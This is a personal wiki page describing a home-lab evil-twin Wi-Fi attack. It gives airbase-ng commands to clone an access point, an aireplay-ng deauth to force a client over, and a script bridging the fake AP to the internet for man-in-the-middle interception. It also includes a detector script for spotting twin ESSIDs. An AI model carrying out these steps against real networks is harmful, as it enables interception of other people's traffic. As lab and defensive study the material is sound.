From charlesreid1

Revision as of 05:24, 23 August 2015

Setup

The Machines

A note on machine names.

kronos is the sheep.

mars is the attacker.

Goodies

On the attacking machine:

mars $ apt-get install bridge-utils

Procedure

Connect Sheep to Good Twin

First step is to connect the sheep (kronos) to the good twin. On the sheep, as root (the <( ) process substitution needs bash):

$ iw dev wlan1 scan
$ wpa_supplicant -D nl80211,wext -i wlan1 -c <(wpa_passphrase "YourESSIDHere" "YourPassphraseHere")

Add -B to send wpa_supplicant to the background, and run dhclient wlan1 afterwards so the sheep gets an address.


Device Information

Get info about your devices:

mars $ iwconfig

AP Information

Get info about the Good Twin AP (its BSSID, channel and encryption). wlan0 must be in monitor mode first, either with iw dev wlan0 set type monitor, which keeps the name, or with airmon-ng start wlan0, which creates a separately named monitor interface (wlan0mon on recent aircrack-ng, mon0 on older releases); the same goes for the card airbase-ng runs on below:

mars $ airodump-ng wlan0

Create Evil Twin (Window 1)

To create our Evil Twin AP, we'll use airbase:

mars $ airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>

or, to make it shorter (airbase-ng then uses the card's own MAC address as the BSSID):

mars $ airbase-ng --essid <ESSID of network> <interface>

So for example, we might listen for the Good Twin router on channel 11, see it, then create our base station on the same channel with the same BSSID and ESSID:

mars $ airbase-ng -a AA:BB:CC:DD:EE:FF --essid "HomeRouter" -c 11 wlan1
21:39:29  Created tap interface at0
21:39:29  Trying to set MTU on at0 to 1500
21:39:29  Trying to set MTU on wlan1 to 1800
21:39:29  Access Point with BSSID AA:BB:CC:DD:EE:FF started.

Make Evil Twin Obnoxious

THIS STEP IS ENTIRELY OPTIONAL AND NOT RECOMMENDED.

To make sure that the Sheep only hears the Evil Twin, you can crank up the transmit power of the card running airbase-ng (wlan1 here). The value is in dBm, and the driver caps it at whatever the regulatory domain allows (see iw reg get):

mars $ iwconfig wlan1 txpower 27

WARNING: You can break the law by transmitting at too high a power. Know the laws. You are responsible for your actions and you are responsible for not breaking the law.

DUH.

Anyway...

Instrumenting the Network

No experiment in security would be any good if we weren't watching what was going on with the internals of the network!

I put a second wireless card on the sheep, and before the whole attack went down, I fired up wireshark and started a packet dump on the network to watch what was happening.

Deauth Sheep on Good Twin (Window 2)

Now, listen for the network from the attack platform. Make sure you don't use the same wireless card that you're using to run the access point, and that the listening card is in monitor mode. Adding -c <channel> locks it to the Good Twin's channel, which the deauth below needs:

mars $ airodump-ng -w eviltwin wlan0

Also, if we watch our airbase window, with the command we ran previously, we see some activity:

mars $ airbase-ng -a XXX --essid "Walrus" -c 11 wlan1
21:49:23  Created tap interface at0
21:49:23  Trying to set MTU on at0 to 1500
21:49:23  Access Point with BSSID XXX started.
21:53:08  Client XXX associated (WEP) to ESSID: "Walrus"
21:53:17  Client XXX associated (WEP) to ESSID: "Walrus"
21:53:27  Client XXX associated (unencrypted) to ESSID: "Walrus"
21:53:36  Client XXX associated (unencrypted) to ESSID: "Walrus"

Not sure what's going on there. We'll find out soon, I suppose.

Like a magnet, my Raspberry Pi and my iPhone both connected to the fake access point.

The deauth may not even be necessary, since the devices above connected on their own. To kick the Sheep off of the Good Twin anyway, use aireplay-ng's deauth attack (wlan0 in monitor mode and tuned to the Good Twin's channel; -0 1 sends a single burst of deauth frames, -0 0 keeps sending until you stop it):

mars $ aireplay-ng -0 1 -a <AP MAC Address> -c <Sheep MAC Address> wlan0

Once the sheep has been kicked off, it will begin to look for the Good Twin again. But the Evil Twin will be there instead.

Not sure about the output, but I think the sheep is connected to the Evil Twin.

Connecting Sheep to Evil Twin

The Sheep will begin to look for the Good Twin, will see the Evil Twin, and will connect to it.
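As an added example (not part of the original page), here is the check a defender, or the experimenter watching the network, can run over the CSV that airodump-ng -w eviltwin writes beside its capture (eviltwin-01.csv): an ESSID beaconed by two different BSSIDs, one WPA2 and one open, is exactly the footprint the airbase-ng command above leaves. The sample CSV rows, the attacker BSSID 00:11:22:33:44:55, the client MAC and the timestamps are constructed for the example.

```sh
#!/bin/sh
# Added example: flag evil-twin candidates in the CSV that `airodump-ng -w eviltwin`
# writes (eviltwin-01.csv). An ESSID advertised by two different BSSIDs, especially
# when one is WPA2 and the other is open (OPN, what airbase-ng beacons by default),
# is the footprint of the attack described on this page.

# Write a CONSTRUCTED sample in airodump-ng's CSV layout to the file given as $1.
# The attacker BSSID 00:11:22:33:44:55, the client MAC and the timestamps are made up.
make_sample_csv() {
  cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:FF, 2015-08-22 21:30:00, 2015-08-22 21:53:36, 11, 54, WPA2, CCMP, PSK, -47, 310, 0, 0.0.0.0, 10, HomeRouter,
00:11:22:33:44:55, 2015-08-22 21:39:29, 2015-08-22 21:53:36, 10, 54, OPN, , , -21, 220, 0, 0.0.0.0, 10, HomeRouter,
DE:AD:BE:EF:00:01, 2015-08-22 21:30:00, 2015-08-22 21:53:36, 6, 54, WPA2, CCMP, PSK, -70, 150, 0, 0.0.0.0, 6, Walrus,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
66:77:88:99:AA:BB, 2015-08-22 21:53:08, 2015-08-22 21:53:36, -40, 52, 00:11:22:33:44:55, HomeRouter
EOF
}

# Print one line per ESSID seen from more than one BSSID:
#   ESSID<TAB>first BSSID (channel, privacy)<TAB>other BSSID (channel, privacy)<TAB>verdict
# Only the access-point table (between the "BSSID" header and the "Station MAC"
# header) is examined; hidden SSIDs (empty ESSID) are skipped.
find_twin_essids() {
  awk -F', *' '
    { sub(/\r$/, "") }                       # airodump CSVs may have CRLF line ends
    /^BSSID, First time seen/ { in_ap = 1; next }
    /^Station MAC/            { in_ap = 0 }  # client table follows: stop
    in_ap && NF >= 14 && $14 != "" {
      bssid = $1; chan = $4; priv = $6; essid = $14
      desc = bssid " (ch " chan ", " priv ")"
      if (!(essid in first)) { first[essid] = desc; fpriv[essid] = priv; next }
      verdict = (priv != fpriv[essid]) ? "PRIVACY-MISMATCH" : "DUPLICATE-ESSID"
      printf "%s\t%s\t%s\t%s\n", essid, first[essid], desc, verdict
    }' "$1"
}

# Run against the constructed sample; nothing here touches a radio.
tmp=$(mktemp)
make_sample_csv "$tmp"
find_twin_essids "$tmp"
rm -f "$tmp"
```

On a real capture, pass the eviltwin-01.csv path instead of the sample. A PRIVACY-MISMATCH line is the strong signal: a legitimate network with two access points (roaming) shows DUPLICATE-ESSID with the same privacy setting on both, whereas the airbase-ng twin above beacons open while the Good Twin stays WPA2.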

Keeping Sheep Connected to Internet

Keep the sheep surfing the web by creating a bridge.

Remember we created an evil twin access point with airbase-ng on wlan1, and the sheep has been kicked off the Good Twin and is now on the evil twin.

But we need to provide a bridge from the Evil Twin to a working internet connection (the Good Twin's, or any other), so that the Sheep's internet connection stays alive while going through the Evil Twin.

Bridging Devices

On mars, the attack machine, where you ran airbase-ng, you will have a new tap interface created by airbase-ng that is called at0. If at0 is bridged to a working internet connection, then voila, your client has a "wireless" connection through "their" router.

Our evil twin is on wlan1, our sheep's network connection is on at0, and our second wireless card or ethernet port with an internet connection is on eth0.

We'll build a bridge to connect an internet-enabled network interface (eth0) to the sheep's network connection (at0).

Note that at0 and eth0 DO NOT need to be the same router that's being spoofed. That means, you can spoof router A, and bridge a connection from the evil twin of router A to a different internet connection at router B. (And if that connection on router B is faster, the Sheep will probably prefer that you Man-In-The-Middle them!)
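The page installs bridge-utils but stops before the bridge commands themselves. The script below is an added example, not the original page's code: it puts eth0 (the uplink with internet) and at0 (the airbase-ng tap) into a bridge named evil, moves the IP address from eth0 onto the bridge, and tears it down again. The bridge name evil, the DRY_RUN and ALLOW_WIFI_UPLINK variables and the function names are the example's own.

```sh
#!/bin/sh
# Added example: bridge the airbase-ng tap (at0) to the uplink that has internet
# (eth0 here), so the Sheep on the Evil Twin keeps surfing. Run as root with
# bridge-utils and iproute2 installed. DRY_RUN=1 prints the commands instead of
# executing them, which is what makes the usage line at the bottom safe anywhere.

run() {
  if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# A managed-mode Wi-Fi client cannot simply be added to a bridge: the kernel
# refuses unless 4-address mode is on (iw dev <dev> set 4addr on), and the
# upstream AP has to accept that. An Ethernet uplink has no such problem.
check_uplink() {
  dev="$1"
  [ -e "/sys/class/net/$dev" ] || { echo "no such interface: $dev" >&2; return 1; }
  if [ -d "/sys/class/net/$dev/wireless" ] && [ "${ALLOW_WIFI_UPLINK:-0}" != 1 ]; then
    echo "$dev is wireless: enable 4addr on it, then set ALLOW_WIFI_UPLINK=1" >&2
    return 1
  fi
}

# build_bridge <bridge> <uplink> <tap>
build_bridge() {
  br="$1"; uplink="$2"; tap="$3"
  [ "${DRY_RUN:-0}" = 1 ] || check_uplink "$uplink" || return 1
  run brctl addbr "$br"
  run brctl addif "$br" "$uplink"
  run brctl addif "$br" "$tap"
  run ip addr flush dev "$uplink"   # the bridge, not eth0, owns the address from now on
  run ip link set "$uplink" up
  run ip link set "$tap" up
  run ip link set "$br" up
  run dhclient "$br"                # the DHCP server behind eth0 answers mars and the Sheep alike
}

# teardown_bridge <bridge> <uplink> <tap>: undo build_bridge and give the uplink its own lease back
teardown_bridge() {
  br="$1"; uplink="$2"; tap="$3"
  run dhclient -r "$br"
  run ip link set "$br" down
  run brctl delif "$br" "$tap"
  run brctl delif "$br" "$uplink"
  run brctl delbr "$br"
  run dhclient "$uplink"
}

# Usage: dry run first to see what would happen, then DRY_RUN=0 (as root) for real.
DRY_RUN=1 build_bridge evil eth0 at0
```

A bridge forwards at layer 2, so no ip_forward or NAT is needed: the Sheep simply takes a DHCP lease from the network behind eth0, which is why at0 and eth0 need not belong to the router being spoofed. If the uplink is the second wireless card rather than an Ethernet port, the check above will stop you until 4-address mode is enabled on that card and its access point accepts it; when that is not possible, the fallback is to give at0 its own subnet and NAT it out through the wireless uplink (ip_forward=1 plus an iptables MASQUERADE rule) instead of bridging.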

Wayne's World